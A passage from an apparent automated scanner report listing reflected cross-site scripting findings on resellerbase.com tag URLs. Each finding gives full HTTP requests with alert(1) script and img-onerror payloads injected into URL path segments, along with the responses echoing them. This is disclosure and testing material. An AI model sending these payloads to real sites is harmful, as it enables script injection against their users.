User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/3half.gifd37a5<img src=a onerror=alert(1)>687134f9e8d]</td>
...[SNIP]...

2.4484. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload ae1ad</title><img%20src%3da%20onerror%3dalert(1)>65ad9e6585 was submitted in the REST URL parameter 6. This input was echoed as ae1ad</title><img src=a onerror=alert(1)>65ad9e6585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/3half.gifae1ad</title><img%20src%3da%20onerror%3dalert(1)>65ad9e6585 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/3half.gifae1ad</title><img src=a onerror=alert(1)>65ad9e6585</title>
...[SNIP]...

2.4485. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7416<script>alert(1)</script>8764346dd4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc7416<script>alert(1)</script>8764346dd4b/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc7416<script>alert(1)</script>8764346dd4b/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.4486. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6094f<img%20src%3da%20onerror%3dalert(1)>a80e29b2782 was submitted in the REST URL parameter 2. This input was echoed as 6094f<img src=a onerror=alert(1)>a80e29b2782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes6094f<img%20src%3da%20onerror%3dalert(1)>a80e29b2782/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes6094f<img src=a onerror=alert(1)>a80e29b2782/kosmos/images/rating/4.gif]</td>
...[SNIP]...

2.4487. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7d299</title><img%20src%3da%20onerror%3dalert(1)>899e9577b6 was submitted in the REST URL parameter 2. This input was echoed as 7d299</title><img src=a onerror=alert(1)>899e9577b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes7d299</title><img%20src%3da%20onerror%3dalert(1)>899e9577b6/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes7d299</title><img src=a onerror=alert(1)>899e9577b6/kosmos/images/rating/4.gif</title>
...[SNIP]...

2.4488. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 83be7</title><img%20src%3da%20onerror%3dalert(1)>1374ac8fa7b was submitted in the REST URL parameter 3. This input was echoed as 83be7</title><img src=a onerror=alert(1)>1374ac8fa7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos83be7</title><img%20src%3da%20onerror%3dalert(1)>1374ac8fa7b/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos83be7</title><img src=a onerror=alert(1)>1374ac8fa7b/images/rating/4.gif</title>
...[SNIP]...

2.4489. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0372<img%20src%3da%20onerror%3dalert(1)>641357ec4d9 was submitted in the REST URL parameter 3. This input was echoed as b0372<img src=a onerror=alert(1)>641357ec4d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosb0372<img%20src%3da%20onerror%3dalert(1)>641357ec4d9/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosb0372<img src=a onerror=alert(1)>641357ec4d9/images/rating/4.gif]</td>
...[SNIP]...

2.4490. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c3ec<img%20src%3da%20onerror%3dalert(1)>6248f289262 was submitted in the REST URL parameter 4. This input was echoed as 7c3ec<img src=a onerror=alert(1)>6248f289262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images7c3ec<img%20src%3da%20onerror%3dalert(1)>6248f289262/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images7c3ec<img src=a onerror=alert(1)>6248f289262/rating/4.gif]</td>
...[SNIP]...

2.4491. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 3556d</title><img%20src%3da%20onerror%3dalert(1)>572215c9ac9 was submitted in the REST URL parameter 4. This input was echoed as 3556d</title><img src=a onerror=alert(1)>572215c9ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images3556d</title><img%20src%3da%20onerror%3dalert(1)>572215c9ac9/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images3556d</title><img src=a onerror=alert(1)>572215c9ac9/rating/4.gif</title>
...[SNIP]...

2.4492. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e6a6a<img%20src%3da%20onerror%3dalert(1)>2bb4e733c7f was submitted in the REST URL parameter 5. This input was echoed as e6a6a<img src=a onerror=alert(1)>2bb4e733c7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratinge6a6a<img%20src%3da%20onerror%3dalert(1)>2bb4e733c7f/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratinge6a6a<img src=a onerror=alert(1)>2bb4e733c7f/4.gif]</td>
...[SNIP]...

2.4493. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 8feac</title><img%20src%3da%20onerror%3dalert(1)>987b3f76a34 was submitted in the REST URL parameter 5. This input was echoed as 8feac</title><img src=a onerror=alert(1)>987b3f76a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating8feac</title><img%20src%3da%20onerror%3dalert(1)>987b3f76a34/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating8feac</title><img src=a onerror=alert(1)>987b3f76a34/4.gif</title>
...[SNIP]...

2.4494. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a2937<img%20src%3da%20onerror%3dalert(1)>2cc7a9dbce3 was submitted in the REST URL parameter 6. This input was echoed as a2937<img src=a onerror=alert(1)>2cc7a9dbce3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4.gifa2937<img%20src%3da%20onerror%3dalert(1)>2cc7a9dbce3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/4.gifa2937<img src=a onerror=alert(1)>2cc7a9dbce3]</td>
...[SNIP]...

2.4495. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 7e520</title><img%20src%3da%20onerror%3dalert(1)>6d806ee9133 was submitted in the REST URL parameter 6. This input was echoed as 7e520</title><img src=a onerror=alert(1)>6d806ee9133 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/4.gif7e520</title><img%20src%3da%20onerror%3dalert(1)>6d806ee9133 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/4.gif7e520</title><img src=a onerror=alert(1)>6d806ee9133</title>
...[SNIP]...

2.4496. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47ba5<script>alert(1)</script>17f838d39c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag47ba5<script>alert(1)</script>17f838d39c2/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag47ba5<script>alert(1)</script>17f838d39c2/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4497. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c964b<img%20src%3da%20onerror%3dalert(1)>882b893af26 was submitted in the REST URL parameter 2. This input was echoed as c964b<img src=a onerror=alert(1)>882b893af26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesc964b<img%20src%3da%20onerror%3dalert(1)>882b893af26/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesc964b<img src=a onerror=alert(1)>882b893af26/kosmos/images/rating/4half.gif]</td>
...[SNIP]...

2.4498. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 62659</title><img%20src%3da%20onerror%3dalert(1)>f203952bef3 was submitted in the REST URL parameter 2. This input was echoed as 62659</title><img src=a onerror=alert(1)>f203952bef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes62659</title><img%20src%3da%20onerror%3dalert(1)>f203952bef3/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes62659</title><img src=a onerror=alert(1)>f203952bef3/kosmos/images/rating/4half.gif</title>
...[SNIP]...

2.4499. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f914<img%20src%3da%20onerror%3dalert(1)>0d87b0d5e3e was submitted in the REST URL parameter 3. This input was echoed as 2f914<img src=a onerror=alert(1)>0d87b0d5e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos2f914<img%20src%3da%20onerror%3dalert(1)>0d87b0d5e3e/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos2f914<img src=a onerror=alert(1)>0d87b0d5e3e/images/rating/4half.gif]</td>
...[SNIP]...

2.4500. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 6be5f</title><img%20src%3da%20onerror%3dalert(1)>512bde24650 was submitted in the REST URL parameter 3. This input was echoed as 6be5f</title><img src=a onerror=alert(1)>512bde24650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos6be5f</title><img%20src%3da%20onerror%3dalert(1)>512bde24650/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos6be5f</title><img src=a onerror=alert(1)>512bde24650/images/rating/4half.gif</title>
...[SNIP]...

2.4501. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/4half.gif

Issue detail

